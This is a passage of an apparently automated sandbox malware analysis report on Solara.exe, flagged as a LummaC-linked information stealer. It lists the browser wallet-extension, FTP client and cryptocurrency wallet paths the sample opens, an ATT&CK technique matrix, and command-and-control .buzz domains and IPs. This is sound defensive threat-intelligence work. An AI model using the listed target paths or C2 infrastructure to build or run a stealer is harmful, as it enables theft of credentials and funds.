                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: Yara matchFile source: 00000002.00000003.1768091011.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Solara.exe PID: 7620, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Solara.exe PID: 7620, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager241
                Security Software Discovery
                SMB/Windows Admin Shares41
                Data from Local System
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS21
                Virtualization/Sandbox Evasion
                Distributed Component Object Model3
                Clipboard Data
                Protocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem33
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Solara.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://mindhandru.buzz:443/apiE_100%Avira URL Cloudmalware
                https://mindhandru.buzz/apiza2100%Avira URL Cloudmalware
                https://mindhandru.buzz/api0u0u100%Avira URL Cloudmalware
                https://mindhandru.buzz/Z100%Avira URL Cloudmalware
                https://mindhandru.buzz/apiB&100%Avira URL Cloudmalware
                https://mindhandru.buzz:443/apiRd100%Avira URL Cloudmalware
                https://mindhandru.buzz/s100%Avira URL Cloudmalware
                https://mindhandru.buzz/ndows100%Avira URL Cloudmalware
                https://mindhandru.buzz/D100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                mindhandru.buzz
                172.67.165.185
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  scentniej.buzzfalse
                    high
                    hummskitnj.buzzfalse
                      high
                      mindhandru.buzzfalse
                        high
                        https://mindhandru.buzz/apifalse
                          high
                          rebuildeso.buzzfalse
                            high
                            appliacnesot.buzzfalse
                              high
                              screwamusresz.buzzfalse
                                high
                                cashfuzysao.buzzfalse
                                  high
                                  inherineau.buzzfalse
                                    high
                                    prisonyfork.buzzfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabSolara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://ocsp.entrust.net03Solara.exefalse
                                            high
                                            http://ocsp.entrust.net02Solara.exefalse
                                              high
                                              https://mindhandru.buzz:443/apiE_Solara.exe, 00000002.00000002.2897998714.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1792136717.0000000002D5A000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1806487513.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.2454619814.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1831530096.0000000002D5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Solara.exe, 00000002.00000003.1742691939.00000000054CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://mindhandru.buzz/api0u0uSolara.exe, 00000002.00000003.1792136717.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1806487513.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1831530096.0000000002D70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Solara.exe, 00000002.00000003.1695669550.0000000005516000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695603213.0000000005562000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://mindhandru.buzz:443/apiSolara.exe, 00000002.00000002.2897998714.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.2454619814.0000000002D5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://mindhandru.buzz/apiB&Solara.exe, 00000002.00000003.1831492202.0000000002DDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiSolara.exe, 00000002.00000003.1742691939.00000000054CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://x1.c.lencr.org/0Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://x1.i.lencr.org/0Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSolara.exe, 00000002.00000003.1695669550.00000000054F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSolara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://mindhandru.buzz:443/apiRdSolara.exe, 00000002.00000002.2897998714.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1806487513.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.2454619814.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1831530096.0000000002D5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                http://crl.entrust.net/ts1ca.crl0Solara.exefalse
                                                                  high
                                                                  https://support.mozilla.org/products/firefoxgro.allSolara.exe, 00000002.00000003.1742435372.00000000055EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://mindhandru.buzz/apiza2Solara.exe, 00000002.00000003.1694562958.0000000002D5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Solara.exe, 00000002.00000003.1742691939.00000000054CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://mindhandru.buzz/ndowsSolara.exe, 00000002.00000002.2898260079.0000000002DDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgSolara.exe, 00000002.00000003.1742691939.00000000054CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoSolara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://mindhandru.buzz/sSolara.exe, 00000002.00000002.2898260079.0000000002DDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://www.entrust.net/rpa03Solara.exefalse
                                                                            high
                                                                            https://mindhandru.buzz/Solara.exe, 00000002.00000002.2898617643.00000000054D0000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1694613062.0000000002D4E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1694562958.0000000002D70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://aia.entrust.net/ts1-chain256.cer01Solara.exefalse
                                                                                high
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaSolara.exe, 00000002.00000003.1742691939.00000000054CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://ocsp.rootca1.amazontrust.com0:Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Solara.exe, 00000002.00000003.1695669550.0000000005516000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695603213.0000000005562000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.ecosia.org/newtab/Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSolara.exe, 00000002.00000003.1742435372.00000000055EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://ac.ecosia.org/autocomplete?q=Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://mindhandru.buzz/ZSolara.exe, 00000002.00000003.1768028999.0000000002DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                http://crl.microSolara.exe, 00000002.00000003.1792136717.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1806487513.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1831530096.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1831693349.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1694562958.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1768091011.0000000002D70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgSolara.exe, 00000002.00000003.1742691939.00000000054CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://support.microsofSolara.exe, 00000002.00000003.1695603213.0000000005564000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSolara.exe, 00000002.00000003.1695669550.00000000054F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://mindhandru.buzz/DSolara.exe, 00000002.00000003.1831492202.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000002.2898260079.0000000002DDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            http://crl.entrust.net/2048ca.crl0Solara.exefalse
                                                                                                              high
                                                                                                              https://www.entrust.net/rpa0Solara.exefalse
                                                                                                                high
                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs
                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                172.67.165.185
                                                                                                                mindhandru.buzzUnited States
                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                Analysis ID:1581432
                                                                                                                Start date and time:2024-12-27 16:20:06 +01:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 4m 54s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:7
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:Solara.exe
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@4/1@1/1
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 100%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 97%
                                                                                                                • Number of executed functions: 60
                                                                                                                • Number of non-executed functions: 158
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .exe
                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 20.12.23.50, 13.107.246.63
                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                • VT rate limit hit for: Solara.exe
                                                                                                                TimeTypeDescription
                                                                                                                10:20:57API Interceptor8x Sleep call for process: Solara.exe modified
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                172.67.165.185o0cabS0OQn.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                  O53VxanH6A.exeGet hashmaliciousLummaCBrowse
                                                                                                                    5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                                      LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                        CAo57G5Cio.exeGet hashmaliciousLummaCBrowse
                                                                                                                          fer4JIJGeL.exeGet hashmaliciousLummaCBrowse
                                                                                                                            AaEBZ7icLd.exeGet hashmaliciousLummaCBrowse
                                                                                                                              wJtkC63Spw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                cFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    mindhandru.buzz0x001f00000004676d-1858.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    eYAXkcBRfQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    JpzbUfhXi0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    o0cabS0OQn.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                    • 172.67.165.185
                                                                                                                                    738KZNfnzz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    mDuCbT8LnH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    O53VxanH6A.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.165.185
                                                                                                                                    Wvo9FU4qo9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    RDb082EApV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    CLOUDFLARENETUSTrdIE26br9.msiGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.67.148.171
                                                                                                                                    0x001f00000004676d-1858.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    eYAXkcBRfQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    JpzbUfhXi0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    o0cabS0OQn.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                    • 172.67.165.185
                                                                                                                                    738KZNfnzz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    mDuCbT8LnH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                    • 104.21.11.101
                                                                                                                                    Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.66.86
                                                                                                                                    O53VxanH6A.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.165.185
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e10x001f00000004676d-1858.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.165.185
                                                                                                                                    eYAXkcBRfQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.165.185
                                                                                                                                    JpzbUfhXi0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.165.185
                                                                                                                                    o0cabS0OQn.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                    • 172.67.165.185
